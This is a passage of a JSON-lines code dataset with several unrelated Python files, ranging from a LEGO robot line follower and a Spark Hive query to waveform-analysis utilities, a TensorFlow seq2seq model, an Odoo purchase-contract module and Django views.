settings.STATIC_URL[1:],\n        'django.views.static.serve', {\"document_root\": settings.STATIC_ROOT}),\n)\n\nurlpatterns += patterns('',\n    url(r'^oa/site/', include('oa.views.site.urls')),\n    url(r'^(?P[\\.\\w]+)/', include('oa.views.site.urls')),\n)\n\nif settings.DEBUG is False:\n    urlpatterns += patterns('django.contrib.staticfiles.views',\n        url(r'^static/(?P<path>.*)$', 'serve'),\n    )\n","sub_path":"kinger/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":10731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"641786048","text":"#!/usr/bin/env pybricks-micropython\nimport time\nfrom pybricks.ev3devices import Motor, ColorSensor\nfrom pybricks.parameters import Port, Stop\nfrom pybricks.tools import wait\nfrom pybricks.robotics import DriveBase\n\n\n# Initialize the motors.\nleft_motor = Motor(Port.B)\nright_motor = Motor(Port.C)\n\n# Initialize the color sensor.\nline_sensor = ColorSensor(Port.S1)\nline_sensor2 = ColorSensor(Port.S4)\n\n# Initialize the drive base.\nrobot = DriveBase(left_motor, right_motor, wheel_diameter=55.5, axle_track=104)\n\n# Calculate the light threshold. Choose values based on your measurements.\nBLACK = 9\nWHITE = 85\nthreshold = (BLACK + WHITE) / 2\n\n# Set the drive speed in millimeters per second.\nDRIVE_SPEED = 160\n\n# Set the gain of the proportional line controller. This means that for every\n# percentage point of light deviating from the threshold, we set the turn\n# rate of the drivebase to 1.2 degrees per second.\n\n# For example, if the light value deviates from the threshold by 10, the robot\n# steers at 10*1.2 = 12 degrees per second.\nPROPORTIONAL_GAIN = 1.2\n\n# Start following the line endlessly.\nwhile True:\n    # Calculate the deviation from the threshold.\n    deviation = line_sensor.reflection() - threshold\n\n    # Calculate the turn rate.\n    turn_rate = PROPORTIONAL_GAIN * deviation\n\n    # Set the drive base speed and turn rate.\n    robot.drive(DRIVE_SPEED, turn_rate)\n\n    if (line_sensor2.reflection() < 12):\n        start_time = time.time()\n        seconds = 1\n        while True:\n            current_time = time.time()\n            elapsed_time = current_time - start_time\n            robot.drive(DRIVE_SPEED, 0)\n            if elapsed_time > seconds:\n                break \n\n\n    # You can wait for a short time or do other things in this loop.\n    wait(10) \n","sub_path":"Lego/Oving 4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"487361885","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\n\"\"\"\nBefore submitting the script, set the environment variable:\nexport PYTHONIOENCODING=utf8\n\"\"\"\n\nfrom os.path import expanduser, join, abspath\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql import Row\n\nimport platform \nprint(\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaa\")\nprint(platform.python_version() )\n\n# warehouse_location points to the default location for managed databases and tables\nwarehouse_location = abspath('spark-warehouse')\n\nspark = SparkSession \\\n    .builder \\\n    .appName(\"Python Spark SQL Hive integration example\") \\\n    .config(\"spark.sql.warehouse.dir\", warehouse_location) \\\n    .enableHiveSupport() \\\n    .getOrCreate()\n\nlog4jLogger = spark._jvm.org.apache.log4j\nLOGGER = log4jLogger.LogManager.getLogger(__name__)\nLOGGER.info(\"pyspark script logger initialized\")\n\n\ndf = spark.sql('''\n\t select f.filter\n\t from user_ab_log_par a\n\t lateral view json_tuple(a.i, 'data') b as data\n\t lateral view json_tuple(b.data, 'skmrMsg') c as skmrMsg\n\t lateral view json_tuple(c.skmrMsg, 'req') d as req\n\t lateral view json_tuple(d.req, 'skmrSearchHouseReq') e as skmrSearchHouseReq\n\t lateral view json_tuple(e.skmrSearchHouseReq, 'filter') f as filter\n\n\t where a.dates>=\"2018-09-01\"\n\t and a.dates<=\"2018-09-19\"\n\t and f.filter is not null\n\t and a.`__source__` = 1\n\t and a.`__topic__` = 3\n\t and a.t=28000\n\t''')\n\ndef get_keys(value):\n\n    find_keys = []\n    keys = [\"ONLY_FIVE\", \"ONLY_TWO\", \"SELL_QUICK\", \"EDUCATION\", \"SUBWAY_NEAR\", \"FURNISH\", \"EASEMENT\",\n            \"ELECTRIC\", 
\"NEW_FURNISH\", \"LIFEHOOD\"\n ]\n \n for key in keys:\n if key in str(value):\n find_keys.append(key)\n return find_keys\n\nrdd2 = df.rdd.flatMap(get_keys).map(lambda x: (x, 1)).countByKey()\n\nfor k,v in rdd2.items():\n print(\"%s=%s\" %(k,v ))\n\n\n\n\n","sub_path":"spark/demo6-spark-hive-sql.py","file_name":"demo6-spark-hive-sql.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"204252080","text":"# Merge two sorted linked lists and return it as a new list. \n# The new list should be made by splicing together the nodes of the first two lists.\n\n# Example:\n# Input: 1->2->4, 1->3->4\n# Output: 1->1->2->3->4->4\n\n# Runtime: 44 ms, faster than 8.21% of Python3 online submissions for Merge Two Sorted Lists.\n# Memory Usage: 12.7 MB, less than 100.00% of Python3 online submissions for Merge Two Sorted Lists.\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n mergeRoot = ListNode(0)\n ptr = mergeRoot\n cur_l1 = l1\n cur_l2 = l2\n\n while True:\n if (not cur_l1) and (not cur_l2):\n break\n elif not cur_l1:\n while cur_l2:\n ptr.next = ListNode(cur_l2.val)\n ptr = ptr.next\n cur_l2 = cur_l2.next\n break\n elif not cur_l2:\n while cur_l1:\n ptr.next = ListNode(cur_l1.val)\n ptr = ptr.next\n cur_l1 = cur_l1.next\n break\n\n if cur_l1.val <= cur_l2.val:\n ptr.next = ListNode(cur_l1.val)\n ptr = ptr.next\n cur_l1 = cur_l1.next\n else:\n ptr.next = ListNode(cur_l2.val)\n ptr = ptr.next\n cur_l2 = cur_l2.next\n\n ptr = mergeRoot.next\n return ptr\n\ndef stringToListNode(numbers):\n # Now convert that list into linked list\n dummyRoot = ListNode(0)\n ptr = dummyRoot\n for number in numbers:\n ptr.next = ListNode(number)\n ptr = ptr.next\n\n ptr = dummyRoot.next\n return ptr\n\ndef listNodeToString(node):\n if not node:\n return \"[]\"\n\n result = \"\"\n while node:\n result += str(node.val) + \", \"\n node = node.next\n return \"[\" + result[:-2] + \"]\"\n\ns1 = [1,2,4]\ns2 = [1,3,4]\nl1 = stringToListNode(s1)\nl2 = stringToListNode(s2)\n\nret = Solution().mergeTwoLists(l1, l2)\nout = listNodeToString(ret)\nprint(out)","sub_path":"Algorithm/Easy/21-Merge-Two-Sorted-Lists.py","file_name":"21-Merge-Two-Sorted-Lists.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429324496","text":"import subprocess\n\n\ndef resize_image(input_path, output_path, width, height):\n size = \"%dx%d\" % (width, height)\n return subprocess.call([\n \"convert\",\n input_path,\n \"-thumbnail\",\n # the > below means don't enlarge images that fit in the box\n size + \">\",\n \"-background\",\n \"transparent\",\n \"-gravity\",\n \"center\",\n # fill the box with the background color (which\n # is transparent)\n \"-extent\",\n size,\n output_path\n ])\n","sub_path":"hotline/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460079084","text":"import numpy as np\nimport uproot\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import norm,poisson,expon,chisquare\nfrom scipy import integrate\nimport awkward as awk\nfrom pylab import rcParams\nrcParams['figure.figsize'] = 15, 11\nimport collections\n\nClockDDC10 = 
6e8\nadccperVolt = 8192\nresistance_ohm = 50\nsampleWidth_ns = 10\n\ndef ReadDDC10_BinWave(fName, doTime=True):\n    waveInfo = {}\n    with open(fName+'.bin','rb') as fp:\n        try:\n            Header = np.fromfile(fp,dtype=np.uint32,count=4)\n\n            waveInfo['numEvents'] = int(Header[0])\n            waveInfo['numSamples'] = int(Header[1])\n            waveInfo['chMap'] = np.array([1 if digit=='1' else 0 for digit in bin(Header[2])[2:]])\n            waveInfo['numChan'] = np.sum(waveInfo['chMap'])\n            waveInfo['file'] = fName\n            byteOrderPattern = hex(int(np.fromfile(fp,dtype=np.uint32,count=1)))\n            print(waveInfo)\n        except ValueError as e:\n            print(e)\n            return None\n        \n        try:\n            waveArr = np.empty((waveInfo['numEvents']*waveInfo['numChan']*(waveInfo['numSamples']+6)),dtype=np.int16)\n            waveArr[:-2] = np.fromfile(fp,dtype=np.int16)\n        except ValueError as e:\n            print(e)\n            return None\n        \n    waveArr = np.reshape(waveArr.astype(dtype=np.float64)/adccperVolt,(waveInfo['numEvents'],waveInfo['numChan'],(waveInfo['numSamples']+6)))[...,2:-4]\n\n    if doTime:\n        with open(fName+'.log','r') as fl:\n            waveInfo['liveTimes_s'] = np.loadtxt(fl,delimiter=',',skiprows=5,max_rows=waveInfo['numEvents'],usecols=(2),dtype=np.float64)/(ClockDDC10)\n        waveInfo['totliveTime_s'] = np.sum(waveInfo['liveTimes_s'])\n    \n    return [waveArr,waveInfo]\n\n\ndef Subtract_Baseline(waveArr,nBase=50):\n    baseWave = waveArr[...,:nBase]\n    sumax = len(waveArr.shape)-1\n    waveBaseline = np.sum(baseWave,axis = sumax)/nBase\n    waveBaserms = np.sqrt(np.sum(baseWave*baseWave,axis = sumax)/nBase - waveBaseline*waveBaseline)\n    subtwaveArr = waveArr - waveBaseline[...,np.newaxis]\n    \n    return subtwaveArr,(waveBaseline,waveBaserms)\n\nfrom collections.abc import Iterable\ndef winQHist(wave,ch,init=175,end=250,nBins=10000,hrange=None,sub=False,evMask=True,nBase=50,doLive=True,binW=0):\n    if sub:\n        wave[0],baseD = Subtract_Baseline(wave[0],nBase)\n    sumax = len(wave[0][:,ch,:].shape)-1\n    wmask=1\n    if isinstance(init,Iterable):\n        wmask1 = np.indices(wave[0][:,ch].shape)[1]>init[...,np.newaxis]\n        wmask *= wmask1\n    else:\n        wmask1 = np.indices(wave[0][:,ch].shape)[1]>init\n        wmask *= wmask1\n    if isinstance(end,Iterable): \n        wmask1 = np.indices(wave[0][:,ch].shape)[1]<end[...,np.newaxis]\n        wmask *= wmask1\n    else:\n        wmask1 = np.indices(wave[0][:,ch].shape)[1]<end\n        wmask *= wmask1\n    # NOTE: the windowed-charge block below is an assumed reconstruction, written\n    # by symmetry with the init mask above and the names used later (ret, qArr,\n    # bRange); it integrates the masked waveform and converts V*samples to charge\n    # with the module constants defined at the top of this file.\n    ret = {}\n    qArr = np.sum(wave[0][:,ch]*wmask,axis=sumax)*sampleWidth_ns/resistance_ohm\n    ret['qArr'] = qArr\n    if hrange is None:\n        hrange = (np.min(qArr),np.max(qArr))\n        bRange = hrange[1]-hrange[0]\n        if binW>0:\n            nBins = int(bRange/binW)\n    tmpQ = list(np.histogram(qArr,bins=nBins,range=hrange))\n    tmpQ[0] = tmpQ[0].astype(float)\n    bWidth = (tmpQ[1][-1] - tmpQ[1][0])/float(nBins)\n    bTot = tmpQ[0].sum()\n    bNorm = bTot*bWidth\n    tmpQ[1] = (tmpQ[1][1:]+tmpQ[1][:-1])/2.0\n    tmpQ.append(tmpQ[0]*np.square(1.0/bNorm))\n    tmpQ[0] *= 1.0/bNorm\n    if doLive:\n        tmpQ[0] *= bTot/float(wave[1]['totliveTime_s'])\n        tmpQ[2] *= np.square(bTot/float(wave[1]['totliveTime_s']))\n    tmpQ.append(np.nonzero(tmpQ[2])[0])\n    \n    ret['qHist'] = list(tmpQ)\n    return ret\n\nimport matplotlib as mpl\nfrom pylab import rcParams\nrcParams['figure.figsize'] = 15, 11\nmpl.rc('axes.formatter', useoffset=False)\ndef peakHist(waveArr,chan=0,yrange=None,yscale=1,ret=False,doplot=True):\n    peakT = np.argmax(waveArr[0][:,chan,:],axis=1)\n    peakV = waveArr[0][np.arange(0,waveArr[1]['numEvents']),chan,peakT]*1e3\n    pHist = np.histogram2d(peakT,peakV,bins=[waveArr[1]['numSamples'],int(adccperVolt/yscale)])\n    if doplot:\n        plt.pcolormesh(pHist[1][:-1],pHist[2][:-1],np.transpose(pHist[0])/waveArr[1]['totliveTime_s'],norm=mpl.colors.LogNorm())\n        cbar = plt.colorbar()\n        plt.xlabel(\"peak Time (samples)\")\n        plt.ylabel(\"peak Amplitude (mV)\")\n        if isinstance(yrange,(tuple,list)):\n            plt.ylim(yrange)\n        maxT = np.argmax(np.sum(pHist[0],axis=1))\n        plt.xlim(pHist[1][maxT]-100,pHist[1][maxT]+100)\n        plt.show()\n        
plt.plot(pHist[1][:-1],np.sum(pHist[0],axis=1))\n plt.yscale('log')\n plt.xlabel(\"peak Time (samples)\")\n plt.show()\n plt.plot(pHist[2][:-1],np.sum(pHist[0],axis=0))\n plt.yscale('log')\n plt.xlabel(\"peak Amplitude (mV)\")\n plt.show()\n if ret:\n return pHist,peakT,peakV\n else:\n return pHist\n\ndef plotWaves(waveArr,chan=0,nWaves=100):\n plt.figure()\n for i in range(min(nWaves,len(waveArr))):\n plt.plot(waveArr[i,chan,:],marker='+')\n plt.xlabel('samples (10ns)')\n plt.ylabel('V')\n plt.show()\n return plt.gcf()\n\ndef gpn(q,n,q0,q1,s0,s1,u):\n if n==0:\n return norm.pdf(q,q0,np.abs(s0))*float(poisson.pmf(0,u))\n else:\n sn = s0*s0 + (n*s1*s1)\n gan = norm.pdf(q,q0+n*q1,np.sqrt(sn))*float(poisson.pmf(n,u))\n return gan+gpn(q,n-1,q0,q1,s0,s1,u)\ndef gpn2(q,n,q0,q1,s0,s1,u,Na=1):\n return Na*gpn(q,n,q0,q1,s0,s1,u)\n\ndef g2(q,q0,q1,s0,s1):\n\t\treturn norm.pdf(q,q0,np.abs(s0)) + norm.pdf(q,q1,np.abs(s1))\n\ndef fitQ(Qhist,P,doErr=False,dof=0):\n P = collections.OrderedDict(P)\n \n ng = len(P)\n mx = Qhist[1]\n mN = Qhist[0].sum()*(mx[1]-mx[0])\n my = Qhist[0]/mN\n merr = None\n abSig = None\n if doErr:\n args = Qhist[3]\n mx = mx[args]\n my = my[args]\n merr = np.sqrt(Qhist[2][args]/(mN*mN))\n abSig = True\n lambdg = lambda q,q0,q1,s0,s1: g2(q,q0,q1,s0,s1)\n \n fit,tmp = curve_fit(lambdg,mx,my,p0=list(P.values()),bounds=([-1,0,0,0],np.inf),sigma=merr,absolute_sigma=abSig,maxfev=10000,ftol=1e-8,gtol=1e-8)\n mchi2 = chisquare(my,g2(mx,*fit),ddof=dof)\n #print(fit)\n params = P.copy()\n params.update(zip(params,fit))\n paramerr = params.copy()\n paramerr.update(zip(paramerr,np.diag(tmp)))\n params['chi2'] = mchi2\n params['norm'] = mN\n return params,paramerr\n\ndef fitQP(Qhist,P,N=50,doErr=False,dof=0):\n P['Na'] = 1\n P = collections.OrderedDict(P)\n \n ng = len(P)\n mx = Qhist[1]\n mN = Qhist[0].sum()*(mx[1]-mx[0])\n my = Qhist[0]/mN\n merr = None\n abSig = None\n if doErr:\n args = Qhist[3]\n mx = mx[args]\n my = my[args]\n merr = np.sqrt(Qhist[2][args]/(mN*mN))\n abSig = True\n lambdgpn = lambda q,q0,q1,s0,s1,u,Na: gpn2(q,N,q0,q1,s0,s1,u,Na)\n \n fit,tmp = curve_fit(lambdgpn,mx,my,p0=list(P.values()),bounds=([-np.inf,0,0,0,0,0],np.inf),sigma=merr,absolute_sigma=abSig,maxfev=10000,ftol=1e-8,gtol=1e-8)\n mchi2 = chisquare(my,gpn2(mx,N,*fit),ddof=dof)\n #print(fit)\n params = P.copy()\n params.update(zip(params,fit))\n paramerr = params.copy()\n paramerr.update(zip(paramerr,np.diag(tmp)))\n params['chi2'] = mchi2\n params['norm'] = mN\n return params,paramerr\n \n#Pulse Finding \n#create kernel for Laplacian of Gaussian edge finding filter\ndef LoGkernel(sigma=1,scale=5,norm=False):\n sigma2 = sigma*sigma\n size = int(scale*sigma)\n x = (np.arange(size) - (size-1)/2.0)\n kernel = (x*x/sigma2 - 1)/sigma2\n N = 1/(sigma*np.sqrt(2*np.pi)) if norm else 1\n x2 = N*np.exp(-x*x/(2*sigma2))\n print(x)\n print(kernel)\n LoG = kernel*x2\n return LoG\n\n#filter performed using signal.fftconvolve() which allows convolution along axis, i.e. 
all filtered wave forms generated in one line utiizing scipy optimizations\n\n#calculate minimum maximum and gradient of sliding window of Filtered Waveform\ndef mmg_rolling(a, window):\n axis =-1\n shape = a.shape[:axis] + (a.shape[axis] - window + 1, window)\n strides = a.strides + (a.strides[-1],)\n rolling = np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)\n grad = (rolling[...,-1]-rolling[...,0])/float(window-1.0)\n return np.max(rolling,axis=axis),np.min(rolling,axis=axis),grad\n\n#zero crossings of filtered waveform are candidate edges, gradient discriminates rising edge v falling edge candidates\n#-1 elements are rising edge candidates and +1 elements are falling edge candidates\ndef zero_crossing(mLoG,mWave,thresh,window=3):\n maxL,minL,gradL = mmg_rolling(mLoG,window)\n #print(grad2L,gradL)\n pzero = (mLoG[...,1:-1]>0)\n zeroCross = np.zeros(shape=mLoG.shape).astype(np.int)\n zeroCross[...,1:-1] = pzero*(minL<0) + (1-pzero)*(maxL>0)\n diffL = maxL-minL\n zeroCross[...,1:-1] = zeroCross[...,1:-1]*(diffL > thresh)\n zeroCross[...,1:-1] = ((gradL>thresh/window).astype(np.int)-(gradL<-thresh/window).astype(np.int))*zeroCross[...,1:-1]\n \n #zeroCross[zeroCross==0] = np.nan\n lEd = awk.fromiter([np.nonzero(zi)[0] for zi in zeroCross<0])\n rEd = awk.fromiter([np.nonzero(zi)[0] for zi in zeroCross>0])\n return (lEd,rEd),np.pad(gradL,[(0,)]*(gradL.ndim-1)+[(1,)],'constant',constant_values=(0))\n\n\n#Now sort through candidate edges\n#Maybe integrate from every left edge to every right edge (one sided search)\n#Find minima between left right edge pairs\n#Set a min threshold for the integral\n#All edge combinations with integral above threshold kept\n#Sort kept ranges by size\n#Starting from smallest range integrate beyond boundary (both sides) until fractional change in integral is <1% (set as new left and right edge)\n#Now look for overlapping pulses and merge","sub_path":"AnaUtils.py","file_name":"AnaUtils.py","file_ext":"py","file_size_in_byte":9806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"9730933","text":"import random\n\nimport numpy as np\nimport tensorflow as tf\nimport sys\n\nnp.random.seed(1000)\n\nclass Seq2SeqModel(object):\n def __init__(self, encoder_size, decoder_size, hidden_dim, input_dim, output_dim):\n self.encoder_size = encoder_size\n self.decoder_size = decoder_size\n self.hidden_dim = hidden_dim\n self.input_dim = input_dim\n self.output_dim = output_dim\n\n self.encoder_inputs = []\n for i in range(encoder_size):\n self.encoder_inputs.append(tf.placeholder(tf.float32, shape=[None, input_dim], name=\"encoder{0}\".format(i)))\n self.decoder_inputs = []\n for i in range(decoder_size):\n self.decoder_inputs.append(\n tf.placeholder(tf.float32, shape=[None, output_dim], name=\"decoder{0}\".format(i)))\n\n encoder_cell = tf.contrib.rnn.GRUCell(hidden_dim)\n encoder_cell = tf.contrib.rnn.DropoutWrapper(encoder_cell, output_keep_prob=0.5)\n encoder_outputs, state = tf.contrib.rnn.static_rnn(encoder_cell, self.encoder_inputs, dtype=tf.float32)\n # construct gru basic cell\n decoder_cell = tf.contrib.rnn.GRUCell(hidden_dim)\n W = tf.Variable(tf.truncated_normal([hidden_dim, output_dim]))\n b = tf.Variable(tf.truncated_normal([output_dim]))\n\n self.decoder_outputs = []\n with tf.variable_scope(\"rnn_decoder\"):\n for i, inp in enumerate(self.decoder_inputs):\n if i == 0:\n prev = self.encoder_inputs[-1]\n if i > 0:\n tf.get_variable_scope().reuse_variables()\n decoder_output, state = 
decoder_cell(prev, state)\n                prev = tf.matmul(decoder_output, W) + b\n                self.decoder_outputs.append(prev)\n\n        self.loss = 0.0\n        for i in range(len(self.decoder_inputs)):\n            self.loss += tf.sqrt(tf.reduce_sum(tf.square(self.decoder_inputs[i] - self.decoder_outputs[i])))\n\n        self.optimizer = tf.train.AdamOptimizer(0.001).minimize(self.loss)\n        self.saver = tf.train.Saver(tf.global_variables())\n    \n    def step(self, sess, X, y, encoder_size, decoder_size, is_training):\n        input_feed = {}\n        for i in range(encoder_size):\n            input_feed[self.encoder_inputs[i].name] = X[i]\n        for i in range(decoder_size):\n            input_feed[self.decoder_inputs[i].name] = y[i]\n        # train\n        if is_training:\n            output_feed = [self.loss, self.decoder_outputs, self.optimizer]\n            outputs = sess.run(output_feed, input_feed)\n        # test\n        else:\n            output_feed = [self.loss, self.decoder_outputs]\n            outputs = sess.run(output_feed, input_feed)\n        return outputs[0], outputs[1]\n\n    def get_batch(self, X, y, batch_size, step):\n        if step == len(X) / batch_size - 1:\n            batch_encode_inputs = X[len(X) - batch_size:]\n            batch_decode_inputs = y[len(y) - batch_size:]\n        else:\n            batch_encode_inputs = X[step*batch_size : (step+1)*batch_size]\n            batch_decode_inputs = y[step*batch_size : (step+1)*batch_size]\n        batch_encode_inputs = np.transpose(batch_encode_inputs, (1, 0, 2))\n        batch_decode_inputs = np.transpose(batch_decode_inputs, (1, 0, 2))\n        return batch_encode_inputs, batch_decode_inputs","sub_path":"code/TrajectoryPrediction-master/GRU/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"604315206","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 29 15:38:12 2017\n\n@author: stangen\n\"\"\"\n\n#Get the required packages\nfrom netCDF4 import Dataset\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\n\n#Import the ncfile, assign a file handle, indicate read-only\nmy_example_nc_file = '/home/disk/hot/stangen/Documents/GEFS/netcdf/pgbf_2017081400_00.nc'\nfh = Dataset(my_example_nc_file, mode='r')\n#Print the variables to see what we have available\nprint(fh.variables)\n\n#Get lat,lon, 500mb height\nlons = fh.variables['longitude'][:]\nlats = fh.variables['latitude'][:]\nZ500 = fh.variables['HGT_500mb'][:]\nZ5002 = fh.variables['HGT_500mb'][0,:,:]\n\ntime = fh.variables['time'][:]\n\nZ500_units = fh.variables['HGT_500mb'].units\n\nfh.close()\n\n\n#print(Z500_00Z)\n\nZ500m = np.mean(Z500)\n\n#Get some parameters for the Stereographic Projection\nlon_0 = lons.mean()\nlat_0 = lats.mean()\n\n\nm = Basemap(projection='merc',llcrnrlat=-80,urcrnrlat=80,\\\n            llcrnrlon=0,urcrnrlon=360,lat_ts=20,resolution='c')\n\n# Because our lon and lat variables are 1D, \n# use meshgrid to create 2D arrays \n# Not necessary if coordinates are already in 2D arrays.\nlon, lat = np.meshgrid(lons, lats)\nxi, yi = m(lon, lat)\n\n# Plot Data\ncs = m.pcolor(xi, yi, Z5002)\n#cs = m.contour(xi, yi, Z5002,15,linewidths=1.5)\n\n# Add Grid Lines\nm.drawparallels(np.arange(-80., 81., 10.), labels=[1,0,0,0], fontsize=10)\nm.drawmeridians(np.arange(0., 361., 10.), labels=[0,0,0,1], fontsize=10)\n\n# Add Coastlines, States, and Country Boundaries\nm.drawcoastlines()\nm.drawstates()\nm.drawcountries()\n\n# Add Colorbar\ncbar = m.colorbar(cs, location='bottom', pad=\"10%\")\ncbar.set_label(Z500_units)\n\n# Add Title\nplt.title('DJF Maximum 
Temperature')\n\nplt.show()","sub_path":"EFA/plotting/plotting_practice.py","file_name":"plotting_practice.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544362284","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# For copyright and license notices, see __openerp__.py file in module root\n# directory\n##############################################################################\n\nfrom dateutil.relativedelta import relativedelta\nimport datetime\nimport logging\nimport time\n\nfrom openerp.osv import osv, fields\nimport openerp.tools\nfrom openerp.tools.translate import _\nfrom openerp import models, api\nfrom openerp.addons.decimal_precision import decimal_precision as dp\n\n\nclass account_analytic_account(osv.osv):\n _inherit = \"account.analytic.account\"\n\n def _prepare_invoice_data(self, cr, uid, contract, context=None):\n context = context or {}\n\n journal_obj = self.pool.get('account.journal')\n if contract.type == 'purchase_contract':\n invoice = {}\n if not contract.partner_id:\n raise osv.except_osv(_('No Supplier Defined!'), _(\n \"You must first select a Supplier for Contract %s!\") % contract.name)\n\n fpos = contract.partner_id.property_account_position or False\n journal_ids = journal_obj.search(cr, uid, [(\n 'type', '=', 'purchase'), ('company_id', '=', contract.company_id.id or False)], limit=1)\n if not journal_ids:\n raise osv.except_osv(_('Error!'),\n _('Please define a pruchase journal for the company \"%s\".') % (contract.company_id.name or '', ))\n\n currency_id = False\n if contract.pricelist_id:\n currency_id = contract.pricelist_id.currency_id.id\n elif contract.partner_id.property_product_pricelist:\n currency_id = contract.partner_id.property_product_pricelist.currency_id.id\n elif contract.company_id:\n currency_id = contract.company_id.currency_id.id\n\n invoice = {\n 'account_id': contract.partner_id.property_account_payable.id,\n 'type': 'in_invoice',\n 'reference': contract.name,\n 'partner_id': contract.partner_id.id,\n 'currency_id': currency_id,\n 'journal_id': len(journal_ids) and journal_ids[0] or False,\n 'date_invoice': contract.recurring_next_date,\n 'origin': contract.code,\n 'fiscal_position': fpos and fpos.id,\n 'company_id': contract.company_id.id or False,\n }\n return invoice\n else:\n return super(account_analytic_account, self)._prepare_invoice_data(cr, uid, contract, context=context)\n\n def _prepare_invoice_lines(self, cr, uid, contract, fiscal_position_id, context=None):\n\n if not context:\n context = {}\n if contract.type == 'purchase_contract':\n fpos_obj = self.pool.get('account.fiscal.position')\n fiscal_position = None\n if fiscal_position_id:\n fiscal_position = fpos_obj.browse(\n cr, uid, fiscal_position_id, context=context)\n invoice_lines = []\n for line in contract.recurring_invoice_line_ids:\n\n res = line.product_id\n account_id = res.property_account_expense.id\n if not account_id:\n account_id = res.categ_id.property_account_expense_categ.id\n account_id = fpos_obj.map_account(\n cr, uid, fiscal_position, account_id)\n\n taxes = res.supplier_taxes_id or False\n if taxes:\n tax_ids = [x.id for x in taxes]\n tax_ids = self.pool['account.tax'].search(\n cr, uid,\n [('id', 'in', tax_ids),\n ('company_id', '=', contract.company_id.id)],\n context=context)\n taxes = self.pool['account.tax'].browse(\n cr, uid, tax_ids, context=context)\n tax_id = 
fpos_obj.map_tax(cr, uid, fiscal_position, taxes)\n\n invoice_lines.append((0, 0, {\n 'name': line.name,\n 'account_id': account_id,\n 'account_analytic_id': contract.id,\n 'price_unit': line.price_unit or 0.0,\n 'quantity': line.quantity,\n 'uos_id': line.uom_id.id or False,\n 'product_id': line.product_id.id or False,\n 'invoice_line_tax_id': [(6, 0, tax_id)],\n }))\n return invoice_lines\n else:\n return super(account_analytic_account, self)._prepare_invoice_lines(cr, uid, contract, fiscal_position_id, context=None)\n\n def _cron_recurring_create_invoice_purchase(self, cr, uid, context=None):\n current_date = time.strftime('%Y-%m-%d')\n contract_ids = self.search(cr, uid, [('recurring_next_date', '<=', current_date), (\n 'state', '=', 'open'), ('recurring_invoices', '=', True), ('type', '=', 'purchase_contract')])\n return self._recurring_create_invoice(cr, uid, contract_ids, context=context)\n\n\nclass AccountAnalyticInvoiceLine(models.Model):\n _inherit = \"account.analytic.invoice.line\"\n\n @api.multi\n def product_id_change(\n self, product, uom_id, qty=0, name='', partner_id=False,\n price_unit=False, pricelist_id=False, company_id=None):\n context = self._context or {}\n company_id = company_id or False\n local_context = dict(context, company_id=company_id,\n force_company=company_id, pricelist=pricelist_id)\n result = super(AccountAnalyticInvoiceLine, self).product_id_change(\n product=product, uom_id=uom_id, qty=0, name='',\n partner_id=False, price_unit=False, pricelist_id=False,\n company_id=None)\n\n if not product or not context.get('purchase', False):\n return result\n res = self.env['product.product'].with_context(local_context).browse(\n product)\n if pricelist_id:\n price = res.price\n else:\n price = res.standard_price\n result['value']['price_unit'] = price\n if result['value']['uom_id'] != res.uom_id.id:\n new_price = self.env['product.uom']._compute_price(\n res.uom_id.id,\n result['value']['price_unit'],\n result['value']['uom_id'])\n result['value']['price_unit'] = new_price\n return result\n","sub_path":"account_analytic_purchase_contract/account_analytic_analysis.py","file_name":"account_analytic_analysis.py","file_ext":"py","file_size_in_byte":6592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"458384479","text":"'''\nCreated on Jun 8, 2010\n\nContains views for permissions tests\n\n@author: jnaous\n'''\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.views.generic import create_update\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import get_object_or_404\nfrom expedient.common.permissions.utils import get_queryset_from_class\nfrom expedient.common.permissions.utils import get_user_from_req, get_queryset\nfrom expedient.common.permissions.shortcuts import give_permission_to\nfrom expedient.common.permissions.decorators import require_objs_permissions_for_view\nfrom models import PermissionTestClass\n\n@require_objs_permissions_for_view(\n [\"can_get_x2\", \"can_read_val\"],\n get_user_from_req,\n get_queryset(PermissionTestClass, \"obj_id\"),\n)\ndef test_view_x2(request, obj_id=None):\n obj = get_object_or_404(PermissionTestClass, pk=obj_id)\n return HttpResponse(\"%s\" % obj.get_val_x2())\n\n@require_objs_permissions_for_view(\n [\"can_add\"],\n get_user_from_req,\n get_queryset_from_class(PermissionTestClass),\n [\"POST\"],\n)\ndef test_view_create(request):\n return create_update.create_object(\n request, PermissionTestClass,\n 
